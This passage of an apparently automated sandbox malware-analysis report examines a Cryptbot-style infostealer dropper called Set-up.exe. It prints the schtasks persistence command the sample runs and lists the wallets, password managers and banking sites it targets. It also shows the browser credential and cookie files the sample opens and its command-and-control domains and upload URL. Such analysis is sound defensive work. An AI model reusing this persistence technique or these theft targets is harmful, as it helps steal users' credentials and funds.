Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: uwgcijbilmbudmolckmv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: uwgcijbilmbudmolckmv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: uwgcijbilmbudmolckmv.dll	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 9991168 > 1048576

Source: Set-up.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c4a00
Source: Set-up.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x671000

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_00018230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

5_2_00018230

Source: Set-up.exe	Static PE information: section name: .eh_fram
Source: service123.exe.0.dr	Static PE information: section name: .eh_fram
Source: UwGCIJbIlmBudMOlckMv.dll.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_0001A521 push es; iretd	5_2_0001A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3F0C30 push eax; mov dword ptr [esp], edi	5_2_6C3F0DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3BED10 push eax; mov dword ptr [esp], ebx	5_2_6C3BEE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C394E31 push eax; mov dword ptr [esp], ebx	5_2_6C394E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C388E7A push edx; mov dword ptr [esp], ebx	5_2_6C388E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C38A947 push eax; mov dword ptr [esp], ebx	5_2_6C38A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3BEAB0 push eax; mov dword ptr [esp], ebx	5_2_6C3BEBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C392AAC push edx; mov dword ptr [esp], ebx	5_2_6C392AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3A8AA0 push eax; mov dword ptr [esp], ebx	5_2_6C3A909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C390AA2 push eax; mov dword ptr [esp], ebx	5_2_6C390AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3C2BF0 push eax; mov dword ptr [esp], ebx	5_2_6C3C2F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3C2BF0 push edx; mov dword ptr [esp], ebx	5_2_6C3C2F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C388435 push edx; mov dword ptr [esp], ebx	5_2_6C388449
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3A8460 push eax; mov dword ptr [esp], ebx	5_2_6C3A8A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C38048B push eax; mov dword ptr [esp], ebx	5_2_6C3804A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3804E0 push eax; mov dword ptr [esp], ebx	5_2_6C3806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C361CFA push eax; mov dword ptr [esp], ebx	5_2_6C416622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C361CFA push eax; mov dword ptr [esp], ebx	5_2_6C416622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C38A5A7 push eax; mov dword ptr [esp], ebx	5_2_6C38A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3C2620 push eax; mov dword ptr [esp], ebx	5_2_6C3C2954
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3C2620 push edx; mov dword ptr [esp], ebx	5_2_6C3C2973
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3D06B0 push eax; mov dword ptr [esp], ebx	5_2_6C3D0A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3986A1 push 890005EAh; ret	5_2_6C3986A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3806A2 push eax; mov dword ptr [esp], ebx	5_2_6C3806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3806A6 push eax; mov dword ptr [esp], ebx	5_2_6C3806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3806FD push eax; mov dword ptr [esp], ebx	5_2_6C3806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C3866F3 push edx; mov dword ptr [esp], ebx	5_2_6C386707
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C38070E push eax; mov dword ptr [esp], ebx	5_2_6C3806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C38A777 push eax; mov dword ptr [esp], ebx	5_2_6C38A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C390042 push eax; mov dword ptr [esp], ebx	5_2_6C390056
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C35E0D0 push eax; mov dword ptr [esp], ebx	5_2_6C416AF6

Source: C:\Users\user\Desktop\Set-up.exe	File created: C:\Users\user\AppData\Local\Temp\UwGCIJbIlmBudMOlckMv.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Set-up.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Set-up.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f

Source: C:\Users\user\Desktop\Set-up.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_5-158299

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Stalling execution: Execution stalls by calling Sleep

graph_5-158300

Source: C:\Users\user\Desktop\Set-up.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Window / User API: threadDelayed 813

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

API coverage: 1.2 %

Source: C:\Users\user\Desktop\Set-up.exe TID: 5988	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 1308	Thread sleep count: 813 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 1308	Thread sleep time: -81300s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: Set-up.exe	Binary or memory string: VMware
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Set-up.exe, 00000000.00000003.2185018616.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2154640438.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2666887733.0000000001983000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW{
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Set-up.exe	Binary or memory string: UT0VT.node-rednode_modules.quokkaMPC-HCMPC-BEPotPlayerMiniDaumVMwareCCleanerBrowser.exeD:G:I:F:H:C:DewMobileBorisFXInnovative SolutionsimloifkgjagghnncjkhggdhalmcnfklkbackupMultiBitHDwalletsleveldbrecoveryIntel(R)Microsoft_CorporationGoogle Web DesignerDevice MetadataWindows MailK-MeleonVSCommonvshubVS Revo Group@trezorLedger LiveMarc Gravell.tlauncherjvmsjava(local_dir_header_ofs & (pZip->m_file_offset_alignment - 1)) == 0Opera GXDefaultOpera CryptoOpera DeveloperOperaOpera UnknownOpera Beta/home/anal/bot/zip_include/zip.c(zip->entry.header_offset & (pzip->m_file_offset_alignment - 1)) == 0bit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATOR(cur_archive_file_ofs & (pZip->m_file_offset_alignment - 1)) == 0WebStorageVideoDecodeStatsoptimization_guide_prediction_model_downloads4kdownload.com\bluestacks-services\atomic\AMD
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Set-up.exe, 00000000.00000000.2043681328.00000000017D7000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .node-rednode_modules.quokkaMPC-HCMPC-BEPotPlayerMiniDaumVMwareCCleanerBrowser.exeD:G:I:F:H:C:DewMobileBorisFXInnovative SolutionsimloifkgjagghnncjkhggdhalmcnfklkbackupMultiBitHDwalletsleveldbrecoveryIntel(R)Microsoft_CorporationGoogle Web DesignerDevice MetadataWindows MailK-MeleonVSCommonvshubVS Revo Group@trezorLedger LiveMarc Gravell.tlauncherjvmsjava(local_dir_header_ofs & (pZip->m_file_offset_alignment - 1)) == 0Opera GXDefaultOpera CryptoOpera DeveloperOperaOpera UnknownOpera Beta/home/anal/bot/zip_include/zip.c(zip->entry.header_offset & (pzip->m_file_offset_alignment - 1)) == 0bit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATOR(cur_archive_file_ofs & (pZip->m_file_offset_alignment - 1)) == 0WebStorageVideoDecodeStatsoptimization_guide_prediction_model_downloads4kdownload.com\bluestacks-services\atomic\AMD
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Set-up.exe, 00000000.00000003.2185018616.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2154640438.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2666887733.000000000193E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2666887733.0000000001983000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_00018230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

5_2_00018230

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_0001116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	5_2_0001116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_00011160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	5_2_00011160
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_000111A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	5_2_000111A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_000113C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	5_2_000113C9

Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C3C84D0 cpuid

5_2_6C3C84D0

Source: C:\Users\user\Desktop\Set-up.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Set-up.exe, 00000000.00000002.2666887733.00000000019A1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: 123.exe

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 5.2.service123.exe.6c340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2649593570.000000000451B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Set-up.exe PID: 4816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: service123.exe PID: 5440, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 4816, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Set-up.exe	String found in binary or memory: \Electrum-btcp\wallets
Source: Set-up.exe	String found in binary or memory: \ElectronCash\wallets
Source: Set-up.exe, 00000000.00000000.2043681328.00000000017D7000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: OlkOxygen - Atomic Crypto WalletYoroiPolkadot{.js} extensionSolflare WalletSui WalletBitwarden - Free Password ManagerLastPass - Free Password ManagerEnkrypt - Multichain Crypto WalletRabby WalletAuthyCrypto.com - Wallet ExtensionZilPayExodus Web3 WalletTrust WalletMartian Aptos & Sui Wallet ExtensionOKX WalletAuthenticatorBackpackXverse WalletUniSat WalletTonkeeper - wallet for TONSafePal Extension WalletKeplrTemple - Tezos WalletMEW CXJaxx LibertyGuarda WalletSollet WalletTrezor Password ManagerUnknown Wallet\Ledger Live\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)RAM: Data (Time): CPU: Installed Apps:
Source: Set-up.exe	String found in binary or memory: Jaxx Liberty
Source: Set-up.exe	String found in binary or memory: \Exodus\backup
Source: Set-up.exe	String found in binary or memory: Exodus Web3 Wallet
Source: Set-up.exe	String found in binary or memory: Ethereum (UTC)

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 4816, type: MEMORYSTR

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 4816, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	3 Clipboard Data	112 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Set-up.exe	29%	ReversingLabs	Win32.Trojan.Dacic
Set-up.exe	36%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
twelvevx12vs.top	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
analforeverlovyu.top	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
twelvevx12vs.top	1%	Virustotal		Browse
https://gcc.gnu.org/bugs/):	0%	Virustotal		Browse
https://serviceupdate32.com/update	18%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
@twelvevx12vs.top	1%	Virustotal		Browse
http://twelvevx12vs.top/	1%	Virustotal		Browse
s.top	1%	Virustotal		Browse
http://twelvevx12vs.top/v1/upload.php	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
twelvevx12vs.top	84.38.182.221	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
twelvevx12vs.top	true	1%, Virustotal, Browse	unknown
+twelvevx12vs.top	true		unknown
analforeverlovyu.top	true	URL Reputation: safe	unknown
s.top	true	1%, Virustotal, Browse	unknown
LRPCtwelvevx12vs.top	true		unknown
@twelvevx12vs.top	true	1%, Virustotal, Browse	unknown
upload.phps.top	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gcc.gnu.org/bugs/):	UwGCIJbIlmBudMOlckMv.dll.0.dr	false	0%, Virustotal, Browse	unknown
https://duckduckgo.com/ac/?q=	Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
